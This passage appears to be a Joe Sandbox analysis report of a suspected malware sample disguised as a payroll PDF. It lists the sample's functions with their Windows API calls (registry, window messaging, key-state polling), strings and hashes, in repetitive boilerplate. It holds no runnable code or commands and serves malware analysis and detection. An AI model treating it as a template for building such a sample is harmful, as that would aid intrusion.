nul, xrefs: 002B71A3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 8ed8772386aa6caff730afcb963616615eca53501a245e13fa7a7eee6156432a
Instruction ID: a23671b292834c689dae4c1ea5c3b6dd92aba9789daa394b0ea8ccaffd747ac8
Opcode Fuzzy Hash: 8ed8772386aa6caff730afcb963616615eca53501a245e13fa7a7eee6156432a
Instruction Fuzzy Hash: 8621D375524306ABDF209F2C9C08AEAB7E8AF953A0F204619FDB5D32D0D7709861CB70

Function 002BAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002BAF13
__swprintf.LIBCMT ref: 002BAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,002DF910), ref: 002BAF6A

Strings

%lu, xrefs: 002BAF26

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: d0857077b4f28f86b84454e38dc28f13f793aeeb893a9a4a95180ff7fcddc7d2
Instruction ID: 3ae9f65c289e30953d7d71c89a86e4fd674af23cf059eae5bd74d0aba52b2682
Opcode Fuzzy Hash: d0857077b4f28f86b84454e38dc28f13f793aeeb893a9a4a95180ff7fcddc7d2
Instruction Fuzzy Hash: 3A216034A10209AFCB10EF64D985EEE7BB8EF49704B044069F909AB251DB31EE55CF21

Function 002AA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

Part of subcall function 002AA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002AA399
Part of subcall function 002AA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AA3AC
Part of subcall function 002AA37C: GetCurrentThreadId.KERNEL32 ref: 002AA3B3
Part of subcall function 002AA37C: AttachThreadInput.USER32(00000000), ref: 002AA3BA

GetFocus.USER32 ref: 002AA554

Part of subcall function 002AA3C5: GetParent.USER32(?), ref: 002AA3D3

GetClassNameW.USER32(?,?,00000100), ref: 002AA59D
EnumChildWindows.USER32(?,002AA615), ref: 002AA5C5
__swprintf.LIBCMT ref: 002AA5DF

Strings

%s%d, xrefs: 002AA5D9

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 41dbec26464dd087f40c06fb005771d9a84adf83ee0357e8ac015c6dbed5dbb7
Instruction ID: 8071595fa2fca6d7cf4716a8585ee0229fc428b25fed0166cad54d584150dcd2
Opcode Fuzzy Hash: 41dbec26464dd087f40c06fb005771d9a84adf83ee0357e8ac015c6dbed5dbb7
Instruction Fuzzy Hash: C1118E71650209ABDF11AF60EC86FEA377C9F4A701F0480B6B909AA152CF709965CF75

Function 002B2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002B2048

Strings

KEYS, xrefs: 002B205F
APPEND, xrefs: 002B2081
REMOVE, xrefs: 002B204E
EXISTS, xrefs: 002B2070

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 9b1673f9efa338648527c2d9f1b9b13f32b230468024a3edcf370947d5949e57
Instruction ID: 8df06958379327396d097a236da0b7afe860c49ea5347ce1f180cd7f0e114ef4
Opcode Fuzzy Hash: 9b1673f9efa338648527c2d9f1b9b13f32b230468024a3edcf370947d5949e57
Instruction Fuzzy Hash: DB11613492020ADFCF14EFA4D9914EEB7B4FF29304B108869D85567291DB325D2ECF50

Function 002CEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 002CEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002CF07E
CloseHandle.KERNEL32(?), ref: 002CF0FF

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: de20e99b6c26062e1d8b5cf69b9d42c49e2f8535c383cae7eef676b9613ebf4d
Instruction ID: 100f11a1c1a778833d7e4bfa4f15ddc17ec56d868356c82cb046b44b7b822244
Opcode Fuzzy Hash: de20e99b6c26062e1d8b5cf69b9d42c49e2f8535c383cae7eef676b9613ebf4d
Instruction Fuzzy Hash: BB8183716203019FD720DF28C846F2AB7E5AF48B10F14891DF99ADB292DBB0EC548F95

Function 002D02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D0038,?,?), ref: 002D10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002D040E
RegCloseKey.ADVAPI32(?,?), ref: 002D043A
RegCloseKey.ADVAPI32(00000000), ref: 002D0447

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 49c0a69b4c2d5a81a7343c7ffd8c8d7d72e2782d34f684a56e47df4cc67b39cf
Instruction ID: 88553ef8172630f427d43e05b7ab6ac8f3a64b8bb87de96c7705989fe88ad6b8
Opcode Fuzzy Hash: 49c0a69b4c2d5a81a7343c7ffd8c8d7d72e2782d34f684a56e47df4cc67b39cf
Instruction Fuzzy Hash: FC515E31528205AFD704EF64D885F6EB7E8FF88304F04855EB596872A1DB70ED18CB56

Function 002BE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002BE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002BE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002BE8F2

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002BE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002BE91F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 4331e39765aa0eef95ff5ae0c3588106d01267338a771c91c44c682db330d16f
Instruction ID: 9536e61db0eafba840604a3d6f954d93771ddecaa6eb15102ae7de53dcfba750
Opcode Fuzzy Hash: 4331e39765aa0eef95ff5ae0c3588106d01267338a771c91c44c682db330d16f
Instruction Fuzzy Hash: 18512B35A10209DFCF01EF64C9859ADBBF5EF08311B188099E80AAB361CB31ED65CF54

Function 002DA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ae905b4326b198bf9e0b1f210807fc099156cb957078a245cfbdfcb97077a0
Instruction ID: f8f087d20005cc4668f10f6d1edeb048549d1c70dbec7119d1b4aa12ddc52fb3
Opcode Fuzzy Hash: a2ae905b4326b198bf9e0b1f210807fc099156cb957078a245cfbdfcb97077a0
Instruction Fuzzy Hash: 5C412835D21105AFC750DF28DC49FE9BBAAEB09310F1441A7F816A73E0C7B0AD61CA51

Function 00252344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00252357
ScreenToClient.USER32(003167B0,?), ref: 00252374
GetAsyncKeyState.USER32(00000001), ref: 00252399
GetAsyncKeyState.USER32(00000002), ref: 002523A7

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 24321a22f828499be9a53b4e6689cb068978859191c19db6f80e5ba33a0839bc
Instruction ID: 4c5210062f8d87cb0a45679f6f21fc1393b5bd1e84f4e6d2595cddf95bc74cc5
Opcode Fuzzy Hash: 24321a22f828499be9a53b4e6689cb068978859191c19db6f80e5ba33a0839bc
Instruction Fuzzy Hash: 2A41A335524116FBCF159F64C848AE9BB74FB05321F204396FC29922D0C7705D68DFA5

Function 002A6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A695D
TranslateAcceleratorW.USER32(?,?,?), ref: 002A69A9
TranslateMessage.USER32(?), ref: 002A69D2
DispatchMessageW.USER32(?), ref: 002A69DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A69EB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 8fcd35a4758aa26d984a5846e3615e0f9fe77478cce0bcc1daf66f60a5a45889
Instruction ID: f681994d62f1d8b1d0838d63466cd5e1b6f0b9bac9b5ef3106aaedb3a706dc86
Opcode Fuzzy Hash: 8fcd35a4758aa26d984a5846e3615e0f9fe77478cce0bcc1daf66f60a5a45889
Instruction Fuzzy Hash: 9331E471920247ABDB61CFB49C4DBF77BACAB07300F188569E422C24A1DB70D8A5DB90

Function 002A8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002A8F12
PostMessageW.USER32(?,00000201,00000001), ref: 002A8FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002A8FC4
PostMessageW.USER32(?,00000202,00000000), ref: 002A8FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002A8FDA

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
Instruction ID: ddf4ebb76fcd184ae1467e5bff046f73b4a2511f6a3719037088dbcc727455bf
Opcode Fuzzy Hash: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
Instruction Fuzzy Hash: AD31BF7190021AEFDB14CF68D94CA9E7BB6FB05315F104229F925E61D0CBB09D24DB91

Function 002AB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 002AB6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002AB6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002AB71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002AB742
_wcsstr.LIBCMT ref: 002AB74C

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: eb747188e9877a55b0b1d4843b8143e42dbd53c8e03a36f84c0d9c9e788f1ef1
Instruction ID: 8d87d937d656d93ff44750698a265e859c073407d1d9856eaf76b58191b85d89
Opcode Fuzzy Hash: eb747188e9877a55b0b1d4843b8143e42dbd53c8e03a36f84c0d9c9e788f1ef1
Instruction Fuzzy Hash: 6921DA32615205BBEB165F399D49E7BBB9CDF46710F00806AFD09CA1A2EFB1DC60D690

Function 002DB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

GetWindowLongW.USER32(?,000000F0), ref: 002DB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002DB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002DB489
GetSystemMetrics.USER32(00000004), ref: 002DB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002C1184,00000000), ref: 002DB4D0

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: b0753836fa42e3b97ef27503cf34d2cc2359ecb495cc29b067058425b04c7b3f
Instruction ID: 55d00a8a49ab1a6668ebcaa7532a24eea33a0946de71a01602f66fa4f40a0648
Opcode Fuzzy Hash: b0753836fa42e3b97ef27503cf34d2cc2359ecb495cc29b067058425b04c7b3f
Instruction Fuzzy Hash: 9C217671920256EFCB11DF789C28A693764FB05721F15873AF926D62E1D7309C20DB90

Function 002A97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002A9802

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9834
__itow.LIBCMT ref: 002A984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9874
__itow.LIBCMT ref: 002A9885

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: c0deee9af5e5b25cb11bad741915f6b0fd69d018a7494c52ea0fe2961fbef0a1
Instruction ID: 9dff926410ca63baf0086a46c771ad4a43ca6fd2ff412804c8a5c583fb992738
Opcode Fuzzy Hash: c0deee9af5e5b25cb11bad741915f6b0fd69d018a7494c52ea0fe2961fbef0a1
Instruction Fuzzy Hash: 7C210A31B11208AFDB109E669C8AEEE7BACDF4B710F044025FE05DB281DA74CDA59BD1

Function 002512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0025134D
SelectObject.GDI32(?,00000000), ref: 0025135C
BeginPath.GDI32(?), ref: 00251373
SelectObject.GDI32(?,00000000), ref: 0025139C

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 1ab61ac706e9fab05a8c12f04276ffab93bf4e860edd1f48c17353b3019d2ebb
Instruction ID: 40240d0d35668cf275cbb9bd712aa04a03b9c1c587e211b6461927d6dba8d479
Opcode Fuzzy Hash: 1ab61ac706e9fab05a8c12f04276ffab93bf4e860edd1f48c17353b3019d2ebb
Instruction Fuzzy Hash: AD216270C21209EFDB129F69ED097A97BBDFB04322F14C266F811961A0D37198B5DB94

Function 002AC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 002AC176
_memcmp.LIBCMT ref: 002AC194
_memcmp.LIBCMT ref: 002AC1A7
_memcmp.LIBCMT ref: 002AC1BF
_memcmp.LIBCMT ref: 002AC1D7

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c20f755379cffc83432e2b89e420bd302240b31e5f12a0499cf2fa4dbe773d76
Instruction ID: 0e94b2bf6d28922645cf02e84bd263410b029370407bad4f9c7de2245a9149c9
Opcode Fuzzy Hash: c20f755379cffc83432e2b89e420bd302240b31e5f12a0499cf2fa4dbe773d76
Instruction Fuzzy Hash: AB01B9B17791067BD204A9259C42F6B739D9F23394F648015FD0D96243EEA0EE3587E0

Function 002B4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 002B4D5C
__beginthreadex.LIBCMT ref: 002B4D7A
MessageBoxW.USER32(?,?,?,?), ref: 002B4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002B4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002B4DAC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 57e41b823963afea6cbe587f3b8b70d2dae3c2e55ec1bbbb76a376249c4603af
Instruction ID: 8ded30b0ab7866ccc514a1d859d093034703ffc65d504476d83c9c0500b0185f
Opcode Fuzzy Hash: 57e41b823963afea6cbe587f3b8b70d2dae3c2e55ec1bbbb76a376249c4603af
Instruction Fuzzy Hash: B3114872D15245BFC701AFA8EC48AEA7FACEB49320F14826AF914D3251C6B08D1087A0

Function 002A874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8766
GetLastError.KERNEL32(?,002A822A,?,?,?), ref: 002A8770
GetProcessHeap.KERNEL32(00000008,?,?,002A822A,?,?,?), ref: 002A877F
HeapAlloc.KERNEL32(00000000,?,002A822A,?,?,?), ref: 002A8786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A879D

Memory Dump Source

